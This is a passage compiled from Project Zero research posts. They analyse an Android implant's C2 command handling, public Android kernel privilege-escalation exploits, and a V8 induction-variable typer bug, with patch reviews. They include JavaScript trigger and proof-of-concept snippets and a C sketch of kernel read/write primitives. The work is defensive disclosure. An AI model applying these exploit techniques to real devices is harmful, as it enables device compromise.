If the POST request to the C2 server is successful, the code receives back either an executable file or a set of commands, which it will “process”. The response is parsed differently based on the “message code” in the header of the response. This “message code” is similar to what was described in the “Constructing the Request” section: an identification code plus the CRC32 of the 0x10 bytes at 0x25E30. When processing the response, the binary calculates the CRC32 of these bytes again and subtracts it from the message code; the resulting value determines how to treat the contents of the response. The majority of the message codes distinguish different ways for the response to be saved to the device and then executed.

There are a few functions that are commonly used by multiple message codes, so they are described here first.

func1 - Writes the response contents to files in both the /data/dalvik-cache/arm and /mnt directories.

This function does the following:

  1. Writes the buffer of the response to /data/dalvik-cache/arm/<file name keyed by 0x10 in hashtable>
  2. Gets a filename from mkstemp(“/mnt/XXXXXX”)
  3. Writes the buffer of the response to a file with the name from step #2 + “abc” concatenated to the end: /mnt/XXXXXXabc
  4. Writes a specific value from memory to a file with the name from step #2 + “xyz” concatenated to the end: /mnt/XXXXXXxyz. This specific value can be changed through the second function exported by the stage 3 binary: d.

func2 - Fork child process and inject code using ptrace.

This function forks a new process in which the child calls the function init from an ELF library, and the parent then injects the code from the response into the child process using ptrace. The ELF library that is opened with dlopen (and whose init is then called) is named /system/bin/%016lx%016lx, with both values being the address of the buffer pointer.

func3 - Writes the buffer of the reply contents to file and sets the permissions and SELinux attributes.

This function writes the buffer to either the file path provided in the third argument or a newly generated one. If it’s generating a new temporary file path, the code goes down the following list of directory names, beginning with /cache; in the first directory that it can stat, it creates the temporary file using mkstemp(“%s/XXXXXX”).

  • /cache
  • /mnt/secure/asec
  • /mnt/secure/staging
  • /mnt/secure
  • /mnt/obb
  • /mnt/asec
  • /mnt
  • /storage

After the new file is created, the code sets the permissions on the file path to those supplied as the fourth argument. Then it sets the SELinux attributes of the file to those passed in as the fifth argument.

The following section gives a simplified summary of how the response from the C2 server is handled based on the response’s message code:

  • 0x270F: Return 0.
  • 0x2710: The response is a shared library ELF (ET_DYN). Call func2 to fork a child process and inject the ELF using ptrace.
  • 0x2711: The response is a shared library ELF (ET_DYN). Save the file to a temp file on the device and then call dlopen and dlsym(“init”) on the ELF. A child process is then forked. The child process calls init.
  • 0x2712: The response is an ELF file. The file is written to a temporary file on the device. A child process is forked and that child process executes it by calling execve on the file.
  • 0x2713: The response is an ELF file.  The file is written to a temporary file on the device using func3. A child process is forked and that child process executes it by calling system on the file.
  • 0x2714: It forks a child process and that child process calls system(<response contents>).
  • 0x2715: The response is executable code and is mmaped. Certain series of bytes are replaced by the address of dlopen, dlsym, and a function in the binary. Then the code is executed.
  • 0x4E20: If (D1_ENV == 0 && the code can NOT fstat /data/dalvik-cache/arm/system@framework@boot.oat), go into an infinite sleep. Else, set a variable to 1.
  • 0x4E21: The response/buffer is an ELF with type ET_DYN (.so file). If D1_ENV environment variable is set, call func2, which spawns the child process and injects the buffer’s code into it using ptrace. If D1_ENV is not set, write the buffer to the dalvik-cache and /mnt directories through func1.
  • 0x4E22: This message increments the “uninstall_time” variable in the hashtable. For the value that is at key 0xA0 in the hashtable, it will increment it by the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E23: This message sets the “uninstall_time” variable in the hashtable. It will set the value at key 0xA0 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E25: Set the value at the key 0x100 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E26: If the third argument (filepath) to the function that is processing these responses is not NULL and it doesn’t previously exist, make the directory and then set the file permissions and SELinux attributes on the directory to the values passed in as the 4th and 5th arguments.
  • 0x4E27: Write the response buffer to a temporary file using func3.
  • 0x4E28: Call rmdir on a filepath.
  • 0x4E29: Call rmdir on a filepath; if it doesn’t exist, delete uierrors.txt.
  • 0x4E2A: Copy an additional decrypted block to the end of the data that is the value for key 0xE0 in the hash table.
  • 0x4E2B: If (D1_ENV == 0 && we can fstat /data/dalvik-cache/arm/system@framework@boot.oat), set certain variables to 1.
  • 0x4E2C: If the buffer is a 64-bit ELF and D1_ENV == 0, call func1 to write the buffer to the dalvik-cache and /mnt directories.

Conclusion

That concludes our analysis of Stage 3 in the Android exploit chain. We hypothesize that each Stage 2 (and thus Stage 3) includes different configuration variables that would allow the attackers to identify which delivered exploit chain is calling back to the C2 server. In addition, given the detailed information sent to the C2 before stage 4 is returned to the device, it seems unlikely that we would successfully determine the correct values to have a “legitimate” stage 4 returned to us.

It’s especially fascinating how complex and well-engineered this stage 3 code is when you consider that the attackers used only publicly known n-days in stage 2. The attackers used a Google Chrome 0-day in stage 1, public exploits for Android n-days in stage 2, and a mature, complex, thoroughly designed and engineered stage 3. This leads us to believe that the actor likely has more device-specific 0-day exploits.

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 6: Windows Exploits.


In-the-Wild Series: Android Exploits

Published: 2021-01-12 17:37:00

Popularity: 21

Author: Ryan

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mark Brand, Project Zero

A survey of the exploitation techniques used by a high-tier attacker against Android devices in 2020

Introduction

After one of the Chrome exploits has been successful, there are several (quite simple) stages of payload decryption that occur. Once we've got through that, we reach a much more complex binary that is clearly the result of some engineering work. Thanks to that engineering it's very simple for us to locate and examine the exploits embedded inside! For each privilege elevation, they have a function in the .init_array which will register it into a global list which they later use -- this makes it easy for them to plug-and-play additional exploits into their framework, but is also very convenient for us when reverse-engineering their framework:

[screenshot of the .init_array exploit registration code]

Each of the "xyz_register" functions looks like the following, adding an entry to the global list with a probe function used to check whether the device is vulnerable to the given exploit, and to estimate likelihood of success, and an exploit function used to launch the exploit. These probe functions are then used to dynamically determine the best exploit to use based on runtime information about the target device.

[screenshot of one of the “xyz_register” functions]

Looking at the probe functions gives us an idea of which devices are supported, but we can already see something fairly surprising: this attacker is using entirely public exploits for their privilege elevations. Of course, we can't tell for sure that they didn't know about any of these bugs prior to the original public disclosures; but their exploit configuration structure contains an internal "name" describing the exploit, and those map very neatly to either public naming ("iovy", "cow") or CVE numbers ("0569", "0820" for exploits targeting CVE-2015-0569 and CVE-2016-0820 respectively), suggesting that these exploits were very likely developed after those public disclosures and not before.

In addition, as we'll see below, most of the exploits are closely related to public exploits or descriptions of techniques used to exploit the bugs -- adding further weight to the theory that these exploits were implemented well after the original patches were shipped.

Of course, it's important to note that we had a narrow window of opportunity during which we were capturing these exploit chains, and it wasn't possible for us to exhaustively test with different devices and patch levels. It's entirely possible that this attacker also has access to Android 0-day privilege elevations, and we just failed to extract those from the server before being detected. Nonetheless, it's certainly an interesting data-point to see an attacker pairing a sophisticated 0-day exploit for Chrome with, well, a load of bugs patched between 2 and 5 years ago.

Anyway, without further ado let's take a look at the exploits they did fit in here!

Common Techniques

addr_limit pipe kernel read-write: By corrupting the addr_limit variable in the task_struct, this technique gives a user-mode process the ability to read and write arbitrary kernel memory by passing kernel pointers when reading to and writing from a pipe.
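For readers unfamiliar with the technique, a minimal sketch of the resulting primitives is below; it assumes addr_limit has already been corrupted so that the kernel's user-copy checks accept kernel pointers.

#include <stddef.h>
#include <unistd.h>

static int pipefd[2];  /* set up once with pipe(pipefd) */

/* Kernel memory -> user buffer: the kernel copies from the (kernel)
 * "user" pointer into the pipe, then we read it back out. */
static void kernel_read(unsigned long kaddr, void *buf, size_t len) {
    write(pipefd[1], (const void *)kaddr, len);
    read(pipefd[0], buf, len);
}

/* User buffer -> kernel memory: write the payload into the pipe, then
 * have the kernel "copy to user" at the kernel address. */
static void kernel_write(unsigned long kaddr, const void *buf, size_t len) {
    write(pipefd[1], buf, len);
    read(pipefd[0], (void *)kaddr, len);
}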

Userspace shellcode: PXN support on 32-bit Android devices is quite rare, so on most 32-bit devices it was/is still possible to directly execute shellcode from the user-mode portion of the address space. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

Point to userspace memory: PAN support is not ubiquitous on 64-bit Android devices, so it was (on older Android versions) often possible even on 64-bit devices for a kernel exploit to use this technique. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

iovy

The vulnerabilities:

CVE-2015-1805 is a vulnerability in the Linux kernel handling read/write for pipe iovectors, leading to the use of an out-of-bounds struct iovec.

CVE-2016-3809 is an information leak, disclosing the address of a kernel sock structure.

Strategy: Heap-spray with fake iovectors using sendmmsg, race write, readv and mmap/munmap to trigger the vulnerability. This produces a single-use kernel write-what-where.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then corrupt the socket member of the sock structure to point to userspace memory containing a fake structure (and function pointer table); execute userspace shellcode, elevating privileges.

Copy/Paste: ~90%. The exploit strategy is the same as public exploit code, and it looks like this was used as a starting point. The authors did some additional work, presumably to increase portability and stability, and the subsequent flow doesn't match any existing public exploit (that I found), but all of the techniques are publicly known.


Additional References: KEEN Lab "Talk is Cheap, Show Me the Code".

iovy_pxn2

The vulnerabilities: Same as iovy, plus:
P0-822 is an information leak, allowing the reading of arbitrary kernel memory.

Strategy: Same as above.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, and use P0-822 to leak the address of the function pointer table associated with the socket. Then use P0-822 again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~70%. The exploit strategy is the same as above, building the same primitive as the public exploit (addr_limit pipe kernel read-write). Instead of the public approach, they leverage the two additional vulnerabilities, which had public code available. It seems like the development of this exploit was copy/paste integration of the alternative memory-leak primitives, probably to increase portability. The code used for P0-822 is direct copy-paste (inner loop shown below).
[screenshot of the copied P0-822 inner loop]
iovy_pxn3

The vulnerabilities: Same as iovy.

Strategy: Heap-spray with pipe buffers. One thread each for read/write/readv/writev and the usual mmap/munmap thread. Modify all of the pipe buffers, and then run either "read and writev" or "write and readv" threads to get a reusable kernel read-write.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then use kernel-read to leak the address of the function pointer table associated with the socket. Use kernel-read again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~30%. The heap-spray technique is the same as another public exploit, but there is significant additional synchronization added to support multiple reads and writes. There's not really enough unique commonality to determine whether the authors started with that code as a reference or not.

0569

The vulnerability: According to the release notes, CVE-2015-0569 is a heap overflow in Qualcomm's wireless extension IOCTLs, which appears to be where the exploit name is derived from. However, as you can see in the Qualcomm advisory, there were actually 15 commits here under 3 CVEs, and the exploit appears to actually target one of the stack overflows, which was patched as CVE-2015-0570.

Strategy: Corrupt return address; return to userspace shellcode.

Subsequent flow: The shellcode corrupts addr_limit, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: 0%. This bug is trivial to exploit for non-PXN targets, so there would be little to gain by borrowing code.

Additional References: KEEN Lab "Rooting every Android".

0820

The vulnerability: CVE-2016-0820, a linear data-section overflow resulting from a lack of bounds checking.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the KEEN Lab presentation.

Copy/Paste: ~20%. The only public code we could find for this is the PoC attached to our bugtracker; it seems most likely that this was an independent implementation written after KEEN Lab's presentation and based on their description.

Additional References: KEEN Lab "Rooting every Android".

COW

The vulnerability: CVE-2016-5195, also known as DirtyCOW.

Strategy: Depending on the system configuration their exploit will choose between using /proc/self/mem or ptrace for the write thread.

Subsequent flow: There are several different exploitation strategies depending on the target environment, and the full exploitation process here is a fairly complex state-machine involving several hops into different processes, which is likely necessary to support launching the exploit from within an isolated app context.

Copy/Paste: ~5%. The basic code necessary to exploit CVE-2016-5195 was probably copied from one of the many public sources, but the majority of the complexity here is in what is done next, and this doesn't seem to be similar to any of the public Android exploits.

9568

The vulnerability: CVE-2018-9568, also known as WrongZone.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the Baidu Security Lab blog post.

Copy/Paste: ~20%. The code doesn't seem to match the publicly available exploit code for this bug, and it seems most likely that this was an independent implementation written after Baidu's blog post and based on their description.

Additional References: Alibaba Security "From Zero to Root". 
Baidu Security Lab: "KARMA shows you offense and defense".

Conclusion

Nothing very interesting, which is interesting in itself!

Here is an attacker who has access to 0day vulnerabilities in Chrome and Windows, and the ability to develop new and very reliable exploitation techniques in order to exploit these vulnerabilities -- and yet their Android privilege elevation capabilities appear to consist entirely of exploits using public, documented techniques and n-day vulnerabilities.

It certainly seems like they have the capability to write Android exploits. The exploits seem to be based on publicly available source code, and their implementations are based on exploitation strategies described in public sources.

One explanation for this would be that they serve different payloads depending on the targeting, and we were only receiving a "low-value" privilege-elevation capability. Alternatively, perhaps the exploit server URLs that we had access to were specifically configured for a user they knew was using an older device that would be vulnerable to one of these exploits?

Based on all the information available, it's likely that they have more device-specific 0day exploits. We might just not have tested with a device/firmware version that they supported for those exploits and inadvertently missed their more modern exploits.

About the only solid conclusion that we can make is that attackers clearly still see value in developing and maintaining exploits for fairly old Android vulnerabilities, to the extent of supporting those devices long past when their original manufacturers provide support for them.

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 5: Android Post-Exploitation.


In-the-Wild Series: Chrome Infinity Bug

Published: 2021-01-12 17:36:00

Popularity: 8

Author: Ryan


This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Sergei Glazunov, Project Zero

This post only covers one of the exploits, specifically a renderer exploit targeting Chrome 73-78 on Android. We use it as an opportunity to talk about an interesting vulnerability class in Chrome’s JavaScript engine.

Brief introduction to typer bugs

One of the features that make JavaScript code especially difficult to optimize is the dynamic type system. Even for a trivial expression like a + b the engine has to support a multitude of cases depending on whether the parameters are numbers, strings, booleans, objects, etc. JIT compilation wouldn’t make much sense if the compiler always had to emit machine code that could handle every possible type combination for every JS operation. Chrome’s JavaScript engine, V8, tries to overcome this limitation through type speculation. During the first several invocations of a JavaScript function, the interpreter records the type information for various operations such as parameter accesses and property loads. If the function is later selected to be JIT compiled, TurboFan, which is V8’s newest compiler, makes an assumption that the observed types will be used in all subsequent calls, and propagates the type information throughout the whole function graph using the set of rules derived from the language specification. For example: if at least one of the operands to the addition operator is a string, the output is guaranteed to be a string as well; Math.random() always returns a number; and so on. The compiler also puts runtime checks for the speculated types that trigger deoptimization (i.e., revert to execution in the interpreter and update the type feedback) in case one of the assumptions no longer holds.

For integers, V8 goes even further and tracks the possible range of nodes. The main reason behind that is that even though the ECMAScript specification defines Number as the 64-bit floating point type, internally, TurboFan always tries to use the most efficient representation possible in a given context, which could be a 64-bit integer, 31-bit tagged integer, etc. Range information is also employed in other optimizations. For example, the compiler is smart enough to figure out that in the following code snippet, the branch can never be taken and therefore eliminate the whole if statement:

a = Math.min(a, 1);

if (a > 2) {

  return 3;

}

Now, imagine there’s an issue that makes TurboFan believe that the function vuln() returns a value in the range [0; 2] whereas its actual range is [0; 4]. Consider the code below:

a = vuln(a);

let array = [1, 2, 3];

return array[a];

If the engine has never encountered an out-of-bounds access attempt while running the code in the interpreter, it will instruct the compiler to transform the last line into a sequence that at a certain optimization phase, can be expressed by the following pseudocode:

if (a >= array.length) {

  deoptimize();

}

let elements = array.[[elements]];

return elements.get(a);

get() acts as a C-style element access operation and performs no bounds checks. In subsequent optimization phases the compiler will discover that, according to the available type information, the length check is redundant and eliminate it completely. Consequently, the generated code will be able to access out-of-bounds data.

The bug class outlined above is the main subject of this blog post; and bounds check elimination is the most popular exploitation technique for this class. A textbook example of such a vulnerability is the off-by-one issue in the typer rule for String.indexOf found by Stephen Röttger.

A typer vulnerability doesn’t have to immediately result in an integer range miscalculation that would lead to OOB access because it’s possible to make the compiler propagate the error. For example, if vuln() returns an unexpected boolean value, we can easily transform it into an unexpected integer:

a = vuln(a); // predicted = false; actual = true

a = a * 10;  // predicted = 0; actual = 10

let array = [1, 2, 3];

return array[a];

Another notable bug report by Stephen demonstrates that even a subtle mistake such as omitting negative zero can be exploited in the same fashion.

At a certain point, this vulnerability class became extremely popular as it immediately provided an attacker with an enormously powerful and reliable exploitation primitive. Fellow Project Zero member Mark Brand has used it in his full-chain Chrome exploit. The bug class has made an appearance at several CTFs and exploit competitions. As a result, last year the V8 team issued a hardening patch designed to prevent attackers from abusing bounds check elimination. Instead of removing the checks, the compiler started marking them as “aborting”, so in the worst case the attacker can only trigger a SIGTRAP.

Induction variable analysis

The renderer exploit we’ve discovered takes advantage of an issue in a function designed to compute the type of induction variables. The slightly abridged source code below is taken from the latest affected revision of V8:

Type Typer::Visitor::TypeInductionVariablePhi(Node* node) {

  [...]

  // We only handle integer induction variables (otherwise ranges

  // do not apply and we cannot do anything).

  if (!initial_type.Is(typer_->cache_->kInteger) ||

      !increment_type.Is(typer_->cache_->kInteger)) {

    // Fallback to normal phi typing, but ensure monotonicity.

    // (Unfortunately, without baking in the previous type,

    // monotonicity might be violated because we might not yet have

    // retyped the incrementing operation even though the increment's

    // type might been already reflected in the induction variable

    // phi.)

    Type type = NodeProperties::IsTyped(node)

                    ? NodeProperties::GetType(node)

                    : Type::None();

    for (int i = 0; i < arity; ++i) {

      type = Type::Union(type, Operand(node, i), zone());

    }

    return type;

  }

  // If we do not have enough type information for the initial value

  // or the increment, just return the initial value's type.

  if (initial_type.IsNone() ||

      increment_type.Is(typer_->cache_->kSingletonZero)) {

    return initial_type;

  }

  [...]

  InductionVariable::ArithmeticType arithmetic_type =

      induction_var->Type();

  double min = -V8_INFINITY;

  double max = V8_INFINITY;

  double increment_min;

  double increment_max;

  if (arithmetic_type ==

      InductionVariable::ArithmeticType::kAddition) {

    increment_min = increment_type.Min();

    increment_max = increment_type.Max();

  } else {

    DCHECK_EQ(InductionVariable::ArithmeticType::kSubtraction,

              arithmetic_type);

    increment_min = -increment_type.Max();

    increment_max = -increment_type.Min();

  }

  if (increment_min >= 0) {

    // increasing sequence

    min = initial_type.Min();

    for (auto bound : induction_var->upper_bounds()) {

      Type bound_type = TypeOrNone(bound.bound);

      // If the type is not an integer, just skip the bound.

      if (!bound_type.Is(typer_->cache_->kInteger)) continue;

      // If the type is not inhabited, then we can take the initial

      // value.

      if (bound_type.IsNone()) {

        max = initial_type.Max();

        break;

      }

      double bound_max = bound_type.Max();

      if (bound.kind == InductionVariable::kStrict) {

        bound_max -= 1;

      }

      max = std::min(max, bound_max + increment_max);

    }

    // The upper bound must be at least the initial value's upper

    // bound.

    max = std::max(max, initial_type.Max());

  } else if (increment_max <= 0) {

    // decreasing sequence

    [...]

  } else {

    // Shortcut: If the increment can be both positive and negative,

    // the variable can go arbitrarily far, so just return integer.

    return typer_->cache_->kInteger;

  }

  [...]

  return Type::Range(min, max, typer_->zone());

}

Now, imagine the compiler processing the following JavaScript code:

for (var i = initial; i < bound; i += increment) { [...] }

In short, when the loop has been identified as increasing, the lower bound of initial becomes the lower bound of i, and the upper bound is calculated as the sum of the upper bounds of bound and increment. There’s a similar branch for decreasing loops, and a special case for variables that can be both increasing and decreasing. The loop variable is named phi in the method because TurboFan operates on an intermediate representation in the static single assignment form.

Note that the algorithm only works with integers; otherwise a more conservative estimation method is applied. However, in this context an integer refers to a rather special type, which isn’t bound to any machine integer type and can be represented as a floating point value in memory. The type has two unusual properties that have made the vulnerability possible:

  • +Infinity and -Infinity belong to it, whereas NaN and -0 don’t.
  • The type is not closed under addition, i.e., adding two integers doesn’t always result in an integer. Namely, +Infinity + -Infinity yields NaN.

Thus, for the following loop the algorithm infers (-Infinity; +Infinity) as the induction variable type, while the actual value after the first iteration of the loop will be NaN:

for (var i = -Infinity; i < 0; i += Infinity) { }

This one line is enough to trigger the issue. The exploit author had to make only two minor changes: (1) parametrize increment in order to make the value of i match the future inferred type during initial invocations in the interpreter, and (2) introduce an extra variable to ensure the loop eventually ends. As a result, after deobfuscation, the relevant part of the trigger function looks as follows:

function trigger(argument) {

  var j = 0;

  var increment = 100;

  if (argument > 2) {

    increment = Infinity;

  }

  for (var i = -Infinity; i <= -Infinity; i += increment) {

    j++;

    if (j == 20) {

      break;

    }

  }

[...]

The resulting type mismatch, however, doesn’t immediately let the attacker run arbitrary code. Given that the previously widely used bounds check elimination technique is no longer applicable, we were particularly interested to learn how the attacker approached exploiting the issue.

Exploitation

The trigger function continues with a series of operations aimed at transforming the type mismatch into an integer range miscalculation, similar to what would follow in the previous technique, but with the additional requirement that the computed range be narrowed down to a single number. Since the discovered exploit targets mobile devices, the exact instruction sequence used in the exploit only works on ARM processors. For ease of reading, we've modified it to be compatible with x64 as well.

[...]

  // The comments display the current value of the variable i, the type

  // inferred by the compiler, and the machine type used to store

  // the value at each step.

  // Initially:

  // actual = NaN, inferred = (-Infinity, +Infinity)

  // representation = double

  i = Math.max(i, 0x100000800);

  // After step one:

  // actual = NaN, inferred = [0x100000800; +Infinity)

  // representation = double

  i = Math.min(0x100000801, i);

  // After step two:

  // actual = -0x8000000000000000, inferred = [0x100000800, 0x100000801]

  // representation = int64_t

  i -= 0x1000007fa;

  // After step three:

  // actual = -2042, inferred = [6, 7]

  // representation = int32_t

  i >>= 1;

  // After step four:

  // actual = -1021, inferred = 3

  // representation = int32_t

  i += 10;

  // After step five:

  // actual = -1011, inferred = 13

  // representation = int32_t

[...]

The first notable transformation occurs in step two. TurboFan decides that the most appropriate representation for i at this point is a 64-bit integer as the inferred range is entirely within int64_t, and emits the CVTTSD2SI instruction to convert the double argument. Since NaN doesn’t fit in the integer range, the instruction returns the “indefinite integer value” -0x8000000000000000. In the next step, the compiler determines it can use the even narrower int32_t type. It discards the higher 32-bit word of i, assuming that for the values in the given range it has the same effect as subtracting 0x100000000, and then further subtracts 0x7fa. The remaining two operations are straightforward; however, one might wonder why the attacker couldn’t make the compiler derive the required single-value type directly in step two. The answer lies in the optimization pass called the constant-folding reducer.
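Before moving on to that reducer, note that the step-two behavior is easy to reproduce natively. A minimal demo follows; in C this conversion is formally undefined behavior, so the printed value reflects what CVTTSD2SI produces on x86-64 rather than a language guarantee:

#include <math.h>
#include <stdint.h>
#include <stdio.h>

int main(void) {
    volatile double d = NAN;  /* volatile keeps the compiler from folding */
    int64_t v = (int64_t)d;   /* emitted as CVTTSD2SI on x86-64 */
    printf("%#llx\n", (unsigned long long)v);  /* 0x8000000000000000 */
    return 0;
}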

Reduction ConstantFoldingReducer::Reduce(Node* node) {

  DisallowHeapAccess no_heap_access;

  if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&

      node->op()->HasProperty(Operator::kEliminatable) &&

      node->opcode() != IrOpcode::kFinishRegion) {

    Node* constant = TryGetConstant(jsgraph(), node);

    if (constant != nullptr) {

      ReplaceWithValue(node, constant);

      return Replace(constant);

[...]

If the reducer discovered that the output type of the NumberMin operator was a constant, it would replace the node with a reference to the constant thus eliminating the type mismatch. That doesn’t apply to the SpeculativeNumberShiftRight and SpeculativeSafeIntegerAdd nodes, which represent the operations in steps four and five while the reducer is running, because they both are capable of triggering deoptimization and therefore not marked as eliminable.

Formerly, the next step would be to abuse this mismatch to optimize away an array bounds check. Instead, the attacker makes use of the incorrectly typed value to create a JavaScript array for which bounds checks always pass even outside the compiled function. Consider the following method, which attempts to optimize array constructor calls:

Reduction JSCreateLowering::ReduceJSCreateArray(Node* node) {

[...]

} else if (arity == 1) {

  Node* length = NodeProperties::GetValueInput(node, 2);

  Type length_type = NodeProperties::GetType(length);

  if (!length_type.Maybe(Type::Number())) {

    // Handle the single argument case, where we know that the value

    // cannot be a valid Array length.

    elements_kind = GetMoreGeneralElementsKind(

        elements_kind, IsHoleyElementsKind(elements_kind)

                           ? HOLEY_ELEMENTS

                           : PACKED_ELEMENTS);

    return ReduceNewArray(node, std::vector<Node*>{length}, *initial_map,

                          elements_kind, allocation,

                          slack_tracking_prediction);

  }

  if (length_type.Is(Type::SignedSmall()) && length_type.Min() >= 0 &&

      length_type.Max() <= kElementLoopUnrollLimit &&

      length_type.Min() == length_type.Max()) {

    int capacity = static_cast<int>(length_type.Max());

    return ReduceNewArray(node, length, capacity, *initial_map,

                          elements_kind, allocation,

                          slack_tracking_prediction);

[...]

When the argument is known to be an integer constant less than 16, the compiler inlines the array creation procedure and unrolls the element initialization loop. ReduceJSCreateArray doesn’t rely on the constant-folding reducer and implements its own less strict equivalent that just compares the upper and lower bounds of the inferred type. Unfortunately, even after folding, the function keeps using the original argument node: the folded value is employed during initialization of the backing store, while the length property of the array is set to the original node. This means that if we pass the value we obtained at step five to the constructor, it will return an array with a negative length and a backing store that can fit 13 elements. Given that bounds checks are implemented as unsigned comparisons, the crafted array will allow us to access data well past its end. In fact, any positive value bigger than its predicted version would work as well.

The rest of the trigger function is provided below:

[...]

  corrupted_array = Array(i);

  corrupted_array[0] = 1.1;

  ptr_leak_array = [wasm_module, array_buffer, [...],

                    wasm_module, array_buffer]; 

  extra_array = [13.37, [...], 13.37, 1.234]; 

  return [corrupted_array, ptr_leak_array, extra_array];

}

The attacker forces TurboFan to put the data required for further exploitation right next to the corrupted array and to use the double element type for the backing store as it’s the most convenient type for dealing with out-of-bounds data in the V8 heap.

From this point on, the exploit follows the same algorithm that public V8 exploits have been following for several years:

  1. Locate the required pointers and object fields through pattern-matching.
  2. Construct an arbitrary memory access primitive using an extra JavaScript array and ArrayBuffer.
  3. Follow the pointer chain from a WebAssembly module instance to locate a writable and executable memory page.
  4. Overwrite the body of a WebAssembly function inside the page with the attacker’s payload.
  5. Finally, execute it.

The contents of the payload, which is about half a megabyte in size, will be discussed in detail in a subsequent blog post.

Given that the vast majority of Chrome exploits we have seen at Project Zero come from either exploit competitions or VRP submissions, the most striking difference this exploit has demonstrated lies in its focus on stability and reliability. Here are some examples. Almost the entire exploit is executed inside a web worker, which means it has a separate JavaScript environment and runs in its own thread. This greatly reduces the chance of the garbage collector causing an accidental crash due to the inconsistent heap state. The main thread part is only responsible for restarting the worker in case of failure and passing status information to the attacker’s server. The exploit attempts to further reduce the time window for GC crashes by ensuring that every corrupted field is restored to the original value as soon as possible. It also employs the OOB access primitive early on to verify the processor architecture information provided in the user agent header. Finally, the author has clearly aimed to keep the number of hard-coded constants to a minimum. Despite supporting a wide range of Chrome versions, the exploit relies on a single version-dependent offset, namely, the offset in the WASM instance to the executable page pointer.

Patch 1

Even though there’s evidence this vulnerability was originally used as a 0-day, by the time we obtained the exploit, it had already been fixed. The issue was reported to Chrome by security researchers Soyeon Park and Wen Xu in November 2019 and was assigned CVE-2019-13764. The proof of concept provided in the report is shown below:

function write(begin, end, step) {

  for (var i = begin; i >= end; i += step) {

    step = end - begin;

    begin >>>= 805306382;

  }

}

var buffer = new ArrayBuffer(16384);

var view = new Uint32Array(buffer);

for (let i = 0; i < 10000; i++) {

  write(Infinity, 1, view[65536], 1);

}

As the reader can see, it’s not the most straightforward way to trigger the issue. The code resembles fuzzer output, and the reporters confirmed that the bug had been found through fuzzing. Given the available evidence, we’re fully confident that it was an independent discovery (sometimes referred to as a "bug collision").

Since the proof of concept could only lead to a SIGTRAP crash, and the reporters hadn’t demonstrated, for example, a way to trigger memory corruption, it was initially considered a low-severity issue by the V8 engineers. However, after an internal discussion, the V8 team raised the severity rating to high.

In light of the in-the-wild exploitation evidence, we decided to give the fix, which had introduced an explicit check for the NaN case, a thorough examination:

[...]
const bool both_types_integer =
    initial_type.Is(typer_->cache_->kInteger) &&
    increment_type.Is(typer_->cache_->kInteger);
bool maybe_nan = false;
// The addition or subtraction could still produce a NaN, if the integer
// ranges touch infinity.
if (both_types_integer) {
  Type resultant_type =
      (arithmetic_type == InductionVariable::ArithmeticType::kAddition)
          ? typer_->operation_typer()->NumberAdd(initial_type, increment_type)
          : typer_->operation_typer()->NumberSubtract(initial_type,
                                                      increment_type);
  maybe_nan = resultant_type.Maybe(Type::NaN());
}
// We only handle integer induction variables (otherwise ranges
// do not apply and we cannot do anything).
if (!both_types_integer || maybe_nan) {
[...]

The code makes the assumption that the loop variable may only become NaN if the sum or difference of initial and increment is NaN. At first sight, that seems like a fair assumption. The issue arises from the fact that the value of increment can be changed from inside the loop, which isn’t obvious from the exploit but is demonstrated in the proof of concept sent to Chrome. The typer takes these changes into account and reflects them in increment’s computed type. Therefore, the attacker can, for example, add a negative increment to i until the latter becomes -Infinity, then change the sign of increment and force the loop to produce NaN once more, as demonstrated by the code below:

var increment = -Infinity;
var k = 0;
for (var i = 0; i < 1; i += increment) {
  if (i == -Infinity) {
    increment = +Infinity;
  }
  if (++k > 10) {
    break;
  }
}

Thus, to “revive” the entire exploit, the attacker only needs to change a couple of lines in the trigger function.

Patch 2

The discovered variant was reported to Chrome in February along with the exploitation technique found in the exploit. This time the patch took a more conservative approach and made the function bail out as soon as the typer detects that increment can be Infinity.

[...]
// If we do not have enough type information for the initial value or
// the increment, just return the initial value's type.
if (initial_type.IsNone() ||
    increment_type.Is(typer_->cache_->kSingletonZero)) {
  return initial_type;
}
// We only handle integer induction variables (otherwise ranges do not
// apply and we cannot do anything). Moreover, we don't support infinities
// in {increment_type} because the induction variable can become NaN
// through addition/subtraction of opposing infinities.
if (!initial_type.Is(typer_->cache_->kInteger) ||
    !increment_type.Is(typer_->cache_->kInteger) ||
    increment_type.Min() == -V8_INFINITY ||
    increment_type.Max() == +V8_INFINITY) {
[...]

Additionally, ReduceJSCreateArray was updated to always use the same value for both the length property and the backing store capacity, thus rendering the reported exploitation technique useless.

Unfortunately, the new patch contained an unintended change that introduced another security issue. If we look at the source code of TypeInductionVariablePhi before the patches, we find that it checks whether the type of increment is limited to the constant zero. In this case, it assigns the type of initial to the induction variable. The second patch moved the check above the line that ensures initial is an integer. In JavaScript, however, adding or subtracting zero doesn’t necessarily preserve the type, for example:

-0 + 0        =>  +0
[string] - 0  =>  [number]
[object] + 0  =>  [string]
